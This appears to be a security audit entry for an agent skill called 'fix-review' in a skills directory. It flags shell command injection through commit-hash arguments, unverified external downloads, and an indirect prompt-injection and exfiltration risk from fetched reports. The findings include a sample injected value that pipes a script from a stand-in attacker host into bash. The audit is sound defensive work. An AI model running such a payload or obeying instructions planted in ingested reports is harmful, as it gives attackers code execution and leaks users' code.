The Agent Skills Directory

COMMAND_EXECUTION (HIGH): Multiple files (SKILL.md, bug-detection.md, finding-matching.md) use the Bash tool to execute git commands where user-provided inputs like <source> and <target> commit hashes are directly interpolated. For example, git log <source>..<target> is susceptible to shell command injection (e.g., passing head; curl http://attacker.com | bash; # as a commit reference).
EXTERNAL_DOWNLOADS (MEDIUM): The references/report-parsing.md file recommends installing the gdrive CLI via brew and provides shell scripts to download files from Google Drive using this external tool. This encourages the execution of unverified external binaries and interaction with external cloud storage.
PROMPT_INJECTION (LOW): The skill has a significant indirect prompt injection surface. It ingests untrusted data from external URLs (WebFetch) and local security reports.
Ingestion points: SKILL.md (Phase 2) and references/report-parsing.md utilize WebFetch and Read tools on external reports.
Boundary markers: Absent; there are no instructions to the agent to treat report content as data rather than instructions.
Capability inventory: The agent has access to Bash, Write, and WebFetch tools, which could be abused if an attacker embeds malicious instructions in a security report.
Sanitization: Absent; the skill does not perform any escaping or validation of the ingested report content before processing.
DATA_EXFILTRATION (LOW): While the skill's primary purpose is local analysis, the combination of WebFetch and the ability to read sensitive git commit data creates a risk that a malicious report could trick the agent into exfiltrating code snippets to an external URL.

fix-review